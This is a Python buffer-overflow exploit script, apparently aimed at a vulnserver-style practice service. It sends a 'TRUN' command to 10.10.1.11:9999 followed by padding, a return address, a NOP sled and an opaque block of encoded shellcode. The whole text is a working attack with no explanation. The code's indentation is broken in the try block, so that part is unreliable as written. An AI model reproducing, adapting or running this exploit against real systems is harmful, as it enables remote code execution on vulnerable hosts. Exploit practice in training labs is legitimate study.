tags: fuzzer_shellcode buffer_overflow python_offensive
#!/usr/bin/python3
import sys, socket
overflow = (b"\xd9\xe1\xd9\x74\x24\xf4\x5d\xba\x9b\xcc\x43\xea\x2b\xc9"
b"\xb1\x52\x31\x55\x17\x03\x55\x17\x83\x76\x30\xa1\x1f\x74"
b"\x21\xa4\xe0\x84\xb2\xc9\x69\x61\x83\xc9\x0e\xe2\xb4\xf9"
b"\x45\xa6\x38\x71\x0b\x52\xca\xf7\x84\x55\x7b\xbd\xf2\x58"
b"\x7c\xee\xc7\xfb\xfe\xed\x1b\xdb\x3f\x3e\x6e\x1a\x07\x23"
b"\x83\x4e\xd0\x2f\x36\x7e\x55\x65\x8b\xf5\x25\x6b\x8b\xea"
b"\xfe\x8a\xba\xbd\x75\xd5\x1c\x3c\x59\x6d\x15\x26\xbe\x48"
b"\xef\xdd\x74\x26\xee\x37\x45\xc7\x5d\x76\x69\x3a\x9f\xbf"
b"\x4e\xa5\xea\xc9\xac\x58\xed\x0e\xce\x86\x78\x94\x68\x4c"
b"\xda\x70\x88\x81\xbd\xf3\x86\x6e\xc9\x5b\x8b\x71\x1e\xd0"
b"\xb7\xfa\xa1\x36\x3e\xb8\x85\x92\x1a\x1a\xa7\x83\xc6\xcd"
b"\xd8\xd3\xa8\xb2\x7c\x98\x45\xa6\x0c\xc3\x01\x0b\x3d\xfb"
b"\xd1\x03\x36\x88\xe3\x8c\xec\x06\x48\x44\x2b\xd1\xaf\x7f"
b"\x8b\x4d\x4e\x80\xec\x44\x95\xd4\xbc\xfe\x3c\x55\x57\xfe"
b"\xc1\x80\xf8\xae\x6d\x7b\xb9\x1e\xce\x2b\x51\x74\xc1\x14"
b"\x41\x77\x0b\x3d\xe8\x82\xdc\x48\xe7\x8d\x11\x25\xf5\x8d"
b"\x38\xe9\x70\x6b\x50\x01\xd5\x24\xcd\xb8\x7c\xbe\x6c\x44"
b"\xab\xbb\xaf\xce\x58\x3c\x61\x27\x14\x2e\x16\xc7\x63\x0c"
b"\xb1\xd8\x59\x38\x5d\x4a\x06\xb8\x28\x77\x91\xef\x7d\x49"
b"\xe8\x65\x90\xf0\x42\x9b\x69\x64\xac\x1f\xb6\x55\x33\x9e"
b"\x3b\xe1\x17\xb0\x85\xea\x13\xe4\x59\xbd\xcd\x52\x1c\x17"
b"\xbc\x0c\xf6\xc4\x16\xd8\x8f\x26\xa9\x9e\x8f\x62\x5f\x7e"
b"\x21\xdb\x26\x81\x8e\x8b\xae\xfa\xf2\x2b\x50\xd1\xb6\x4c"
b"\xb3\xf3\xc2\xe4\x6a\x96\x6e\x69\x8d\x4d\xac\x94\x0e\x67"
b"\x4d\x63\x0e\x02\x48\x2f\x88\xff\x20\x20\x7d\xff\x97\x41"
b"\x54")
shellcode = b"C" * 2003 + b"\xaf\x11\x50\x62" + b"\x90" * 32 + overflow
try:
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.connect(('10.10.1.11', 9999))
pyload =b'TRUN /.:/' + shellcode
soc.send(pyload)
soc.close()
except:
print("Error: Unable to establish connection with Server")
sys.exit()